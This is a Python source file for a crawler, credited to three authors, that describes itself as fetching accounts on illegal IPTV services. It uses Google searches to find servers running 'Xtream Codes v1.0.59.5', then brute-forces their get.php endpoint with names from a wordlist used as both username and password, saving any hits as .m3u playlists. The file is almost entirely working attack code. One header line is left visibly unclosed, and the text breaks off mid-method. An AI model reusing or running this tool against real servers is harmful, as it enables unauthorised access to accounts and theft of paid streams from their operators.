import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse
"""Crawler
Class that handles the crawling process that fetch accounts on illegal IPTVs
Authors:
Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
"""
class Crawler(object):
 # version
 version = "1.2.3"
 # output default directory
 outputDir = "output"
 # language default directory
 languageDir = "languages"
 # string used to exploit the CMS
 basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
 # string used to search the CMS
 searchString = "Xtream Codes v1.0.59.5"
 def __init__(self, language = "it"):
 """Default constructor
 Keyword arguments:
 language -- Language parameter allows us to understand what kind of
 names file we need to use. (default it)
 """
 self.language = language.lower()
 self.parsedUrls = []
 self.foundedAccounts = 0
 def change_language(self, language = "it"):
 """Set the language you want to use to brute force names
 Keyword arguments:
 language -- Language parameter allows us to understand what kind of
 names file we need to use. (default it)
 Return:
 boolean -- true if the language file exists, otherwise false
 """
 if os.path.isfile(self.languageDir + "/" + language + ".txt"):
 self.language = language
 return True
 else:
 return False
 def search_links(self):
 """Print the first 30 links from a Web search
 We set the limit of 30 links because this script serve as demonstration and it's
 not intended to be use for personal purpose.
 """
 for url in google.search(self.searchString, num=30, stop=1):
 parsed = urlparse(url)
 self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)
 def search_accounts(self, url = None):
 """Search Accounts
 This is the core method. It will crawl the give url for any possible accounts
 If we found any we will create a new directory under /output with the name
 of the site plus every account as five .m3u. Please use VLC for opening that
 kind of files
 Keyword arguments:
 url -- an url from the fetched list. (default None)
 Return:
 string -- the status of the crawling session
 """
 if not self.parsedUrls:
 return "You must fetch some URLs first"
 try:
 if not url:
 url = random.choice(self.parsedUrls)
 fileName = self.languageDir + "/" + self.language + ".txt"
 fileLength = self.file_length(fileName)
 progressBar = pyprind.ProgBar(fileLength, title = "Fetching account from " + url + " this might take a while.", stream = 1, monitor = True)
 foundedAccounts = 0
 with open(fileName) as f:
 rows = f.readlines()
 for row in rows:
 # Do the injection to the current url using the exploit that we know
 opener = urllib2.build_opener()
 opener.addheaders = [('User-agent', 'Mozilla/5.0' 

 ]
 response = opener.open(url + self.basicString % (row.rstrip().lstrip(), row.rstrip().lstrip()))
 fetched = response.read()
 # Update the progress bar in order to give to the user a nice
 # way to indicate the time left
 fileLength = fileLength - 1
 progressBar.update()
 # IF the fetched content is not empty
 # we build the dedicated .m3u file